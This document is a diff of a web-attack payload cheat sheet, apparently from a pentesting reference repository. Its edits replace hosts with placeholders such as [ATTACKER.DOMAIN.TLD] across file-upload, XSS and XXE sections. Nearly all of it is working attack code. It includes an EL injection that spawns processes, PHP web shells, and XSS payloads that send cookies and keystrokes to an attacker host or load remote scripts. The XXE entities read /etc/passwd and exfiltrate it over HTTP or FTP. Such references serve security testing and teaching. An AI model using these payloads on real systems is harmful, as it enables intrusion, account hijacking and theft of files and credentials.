${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())} ${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
${request.getAttribute("a")} ${request.getAttribute("a")}
``` ```

8
Upload Insecure Files/README.md
View File

@@ -162,7 +162,7 @@ PHP web shells don't always have the `<?php` tag, here are some alternatives:
* The `<?=` is shorthand syntax in PHP for outputting values. It is equivalent to using `<?php echo`. * The `<?=` is shorthand syntax in PHP for outputting values. It is equivalent to using `<?php echo`.
```php ```php
<?=`$_GET[0]`?> <?=`id`?>
``` ```
### Filename Vulnerabilities ### Filename Vulnerabilities
@@ -244,11 +244,11 @@ Example of a malicious `uwsgi.ini` file:
; read from a symbol ; read from a symbol
foo = @(sym://uwsgi_funny_function) foo = @(sym://uwsgi_funny_function)
; read from binary appended data ; read from binary appended data
bar = @(data://[REDACTED]) bar = @(data://[ATTACKER.DOMAIN.TLD])
; read from http ; read from http
test = @(http://[REDACTED]) test = @(http://[ATTACKER.DOMAIN.TLD])
; read from a file descriptor ; read from a file descriptor
content = @(fd://[REDACTED]) content = @(fd://[ATTACKER.DOMAIN.TLD])
; read from a process stdout ; read from a process stdout
body = @(exec://whoami) body = @(exec://whoami)
; call a function returning a char * ; call a function returning a char *

10
XSS Injection/4 - CSP Bypass.md
View File

@@ -50,11 +50,11 @@ Use a callback function from a whitelisted source listed in the CSP.
**Payload**: **Payload**:
`http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//remoteattacker.lab/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;` `http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//[ATTACKER.DOMAIN.TLD]/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;`
```js ```js
script=document.createElement('script'); script=document.createElement('script');
script.src='//remoteattacker.lab/csp.js'; script.src='//[ATTACKER.DOMAIN.TLD]/csp.js';
window.frames[0].document.head.appendChild(script); window.frames[0].document.head.appendChild(script);
``` ```
@@ -69,7 +69,7 @@ Source: [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-yo
**Payload**: **Payload**:
```js ```js
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[ATTACKER.DOMAIN.TLD]";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
``` ```
Source: [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f) Source: [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
@@ -126,13 +126,13 @@ Source: [@404death](https://twitter.com/404death/status/1191222237782659072)
- Inject a base tag. - Inject a base tag.
```html ```html
<base href=http://www.attacker.com> <base href=http://[ATTACKER.DOMAIN.TLD]>
``` ```
- Host your custom js file at the same path that one of the website's script. - Host your custom js file at the same path that one of the website's script.
```ps1 ```ps1
http://www.attacker.com/PATH.js http://[ATTACKER.DOMAIN.TLD]/PATH.js
``` ```
## Bypass CSP header sent by PHP ## Bypass CSP header sent by PHP

20
XSS Injection/README.md
View File

@@ -84,7 +84,7 @@ fclose($fp);
```html ```html
<script> <script>
fetch('https://<SESSION>.burpcollaborator.net', { fetch('https://[ATTACKER.DOMAIN.TLD]', {
method: 'POST', method: 'POST',
mode: 'no-cors', mode: 'no-cors',
body: document.cookie body: document.cookie
@@ -108,7 +108,7 @@ document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue
Another way to collect sensitive data is to set a javascript keylogger. Another way to collect sensitive data is to set a javascript keylogger.
```javascript ```javascript
<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'> <img src=x onerror='document.onkeypress=function(e){fetch("http://[ATTACKER.DOMAIN.TLD]/?k="+String.fromCharCode(e.which))},this.remove();'>
``` ```
### Other Ways ### Other Ways
@@ -152,7 +152,7 @@ Example:
<script>console.log("Test XSS from the search bar of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script> <script>console.log("Test XSS from the search bar of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script>
``` ```
References: Additional reading:
- [Google Bughunter University - XSS in sandbox domains](https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain) - [Google Bughunter University - XSS in sandbox domains](https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain)
- [LiveOverflow Video - DO NOT USE alert(1) for XSS](https://www.youtube.com/watch?v=KHwVjzWei1c) - [LiveOverflow Video - DO NOT USE alert(1) for XSS](https://www.youtube.com/watch?v=KHwVjzWei1c)
@@ -401,7 +401,7 @@ SVG 1.x (xlink:href)
```xml ```xml
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg" height="200" width="200"/> <image xlink:href="http://10.10.10.10:9999/red_lightning_xss_full.svg" height="200" width="200"/>
</svg> </svg>
``` ```
@@ -411,7 +411,7 @@ SVG 1.x (xlink:href)
```xml ```xml
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<use xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg#lightning"/> <use xlink:href="http://10.10.10.10:9999/red_lightning_xss_full.svg#lightning"/>
</svg> </svg>
``` ```
@@ -470,7 +470,7 @@ div {
<script> <script>
document.getElementById('btn').onclick = function(e){ document.getElementById('btn').onclick = function(e){
window.poc = window.open('http://www.redacted.com/#login'); window.poc = window.open('http://10.10.10.10/#login');
setTimeout(function(){ setTimeout(function(){
window.poc.postMessage( window.poc.postMessage(
{ {
@@ -499,9 +499,9 @@ You can set up an alternative version
- Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/) - Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/)
```xml ```xml
"><script src="https://js.rip/<custom.name>"></script> "><script src="https://js.rip/[ATTACKER.DOMAIN.TLD]"></script>
"><script src=//<custom.subdomain>.xss.ht></script> "><script src=//[ATTACKER.DOMAIN.TLD]></script>
<script>$.getScript("//<custom.subdomain>.xss.ht")</script> <script>$.getScript("//[ATTACKER.DOMAIN.TLD]")</script>
``` ```
### Other Blind XSS tools ### Other Blind XSS tools
@@ -530,7 +530,7 @@ You can use a [data grabber for XSS](#data-grabber) and a one-line HTTP server t
Eg. payload Eg. payload
```html ```html
<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script> <script>document.location='http://[ATTACKER.DOMAIN.TLD]/XSS/grabber.php?c='+document.domain</script>
``` ```
Eg. one-line HTTP server: Eg. one-line HTTP server:

40
XXE Injection/README.md
View File

@@ -302,7 +302,7 @@ Payloads from [infosec-au/xxe-windows.md](https://gist.github.com/infosec-au/2c6
```xml ```xml
<?xml version="1.0" ?> <?xml version="1.0" ?>
<!DOCTYPE message [ <!DOCTYPE message [
<!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd"> <!ENTITY % ext SYSTEM "http://[ATTACKER.DOMAIN.TLD]/ext.dtd">
%ext; %ext;
]> ]>
<message></message> <message></message>
@@ -343,29 +343,29 @@ Sometimes you won't have a result outputted in the page but you can still extrac
### Basic Blind XXE ### Basic Blind XXE
The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator. The easiest way to test for a blind XXE is to try to load a remote resource such as a callback endpoint controlled by the tester.
```xml ```xml
<?xml version="1.0" ?> <?xml version="1.0" ?>
<!DOCTYPE root [ <!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x"> %ext; <!ENTITY % ext SYSTEM "http://[ATTACKER.DOMAIN.TLD]/x"> %ext;
]> ]>
<r></r> <r></r>
``` ```
```xml ```xml
<!DOCTYPE root [<!ENTITY test SYSTEM 'http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net'>]> <!DOCTYPE root [<!ENTITY test SYSTEM 'http://[ATTACKER.DOMAIN.TLD]'>]>
<root>&test;</root> <root>&test;</root>
``` ```
Send the content of `/etc/passwd` to "www.malicious.com", you may receive only the first line. Send the content of `/etc/passwd` to `http://[ATTACKER.DOMAIN.TLD]`, you may receive only the first line.
```xml ```xml
<?xml version="1.0" encoding="ISO-8859-1"?> <?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
<!ELEMENT foo ANY > <!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" > <!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;"> <!ENTITY callhome SYSTEM "http://[ATTACKER.DOMAIN.TLD]/?%xxe;">
] ]
> >
<foo>&callhome;</foo> <foo>&callhome;</foo>
@@ -377,12 +377,12 @@ Send the content of `/etc/passwd` to "www.malicious.com", you may receive only t
```xml ```xml
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd"> <!DOCTYPE data SYSTEM "http://[ATTACKER.DOMAIN.TLD]/parameterEntity_oob.dtd">
<data>&send;</data> <data>&send;</data>
File stored on http://publicServer.com/parameterEntity_oob.dtd File stored on http://[ATTACKER.DOMAIN.TLD]/parameterEntity_oob.dtd
<!ENTITY % file SYSTEM "file:///sys/power/image_size"> <!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>"> <!ENTITY % all "<!ENTITY send SYSTEM 'http://[ATTACKER.DOMAIN.TLD]/?%file;'>">
%all; %all;
``` ```
@@ -392,15 +392,15 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd
<?xml version="1.0" ?> <?xml version="1.0" ?>
<!DOCTYPE r [ <!DOCTYPE r [
<!ELEMENT r ANY > <!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml"> <!ENTITY % sp SYSTEM "http://10.10.10.10/dtd.xml">
%sp; %sp;
%param1; %param1;
]> ]>
<r>&exfil;</r> <r>&exfil;</r>
File stored on http://127.0.0.1/dtd.xml File stored on http://10.10.10.10/dtd.xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.10.10/dtd.xml?%data;'>">
``` ```
### XXE OOB with Apache Karaf ### XXE OOB with Apache Karaf
@@ -412,7 +412,7 @@ CVE-2018-11788 affecting versions:
```xml ```xml
<?xml version="1.0" encoding="UTF-8"?> <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://27av6zyg33g8q8xu338uvhnsc.canarytokens.com"> %dtd;] <!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://[ATTACKER.DOMAIN.TLD]"> %dtd;]
<features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" <features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0 http://karaf.apache.org/xmlns/features/v1.3.0"> xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0 http://karaf.apache.org/xmlns/features/v1.3.0">
<feature name="deployer" version="2.0" install="auto"> <feature name="deployer" version="2.0" install="auto">
@@ -500,7 +500,7 @@ _xxe.svg_:
<?xml version="1.0" standalone="yes"?> <?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [ <!DOCTYPE svg [
<!ELEMENT svg ANY > <!ELEMENT svg ANY >
<!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml"> <!ENTITY % sp SYSTEM "http://10.10.10.10:8080/xxe.xml">
%sp; %sp;
%param1; %param1;
]> ]>
@@ -522,7 +522,7 @@ _xxe.xml_:
```xml ```xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hostname"> <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hostname">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://example.org:2121/%data;'>"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://10.10.10.10:2121/%data;'>">
``` ```
### XXE Inside SOAP ### XXE Inside SOAP
@@ -530,7 +530,7 @@ _xxe.xml_:
```xml ```xml
<soap:Body> <soap:Body>
<foo> <foo>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]> <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://10.10.10.10:22/"> %dtd;]><xxx/>]]>
</foo> </foo>
</soap:Body> </soap:Body>
``` ```
@@ -597,7 +597,7 @@ Add your blind XXE payload inside `xl/workbook.xml`.
```xml ```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM "http://x.x.x.x:8000/xxe.dtd">%asd;%c;]> <!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM "http://10.10.10.10:8000/xxe.dtd">%asd;%c;]>
<cdl>&rrr;</cdl> <cdl>&rrr;</cdl>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"> <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
``` ```
@@ -606,7 +606,7 @@ Alternatively, add your payload in `xl/sharedStrings.xml`:
```xml ```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE cdl [<!ELEMENT t ANY ><!ENTITY % asd SYSTEM "http://x.x.x.x:8000/xxe.dtd">%asd;%c;]> <!DOCTYPE cdl [<!ELEMENT t ANY ><!ENTITY % asd SYSTEM "http://10.10.10.10:8000/xxe.dtd">%asd;%c;]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&rrr;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst> <sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&rrr;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst>
``` ```
@@ -618,7 +618,7 @@ And using FTP instead of HTTP allows to retrieve much larger files.
```xml ```xml
<!ENTITY % d SYSTEM "file:///etc/passwd"> <!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://10.10.10.10:2121/%d;'>">
``` ```
Serve DTD and receive FTP payload using [staaldraad/xxeserv](https://github.com/staaldraad/xxeserv): Serve DTD and receive FTP payload using [staaldraad/xxeserv](https://github.com/staaldraad/xxeserv):
@@ -637,7 +637,7 @@ When all you control is the DTD file, and you do not control the `xml` file, XXE
<!-- Load the contents of a sensitive file into a variable --> <!-- Load the contents of a sensitive file into a variable -->
<!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % payload SYSTEM "file:///etc/passwd">
<!-- Use that variable to construct an HTTP get request with the file contents in the URL --> <!-- Use that variable to construct an HTTP get request with the file contents in the URL -->
<!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "http://my.evil-host.com/x=%payload;">'> <!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "http://[ATTACKER.DOMAIN.TLD]/x=%payload;">'>
%param1; %param1;
%external; %external;
``` ```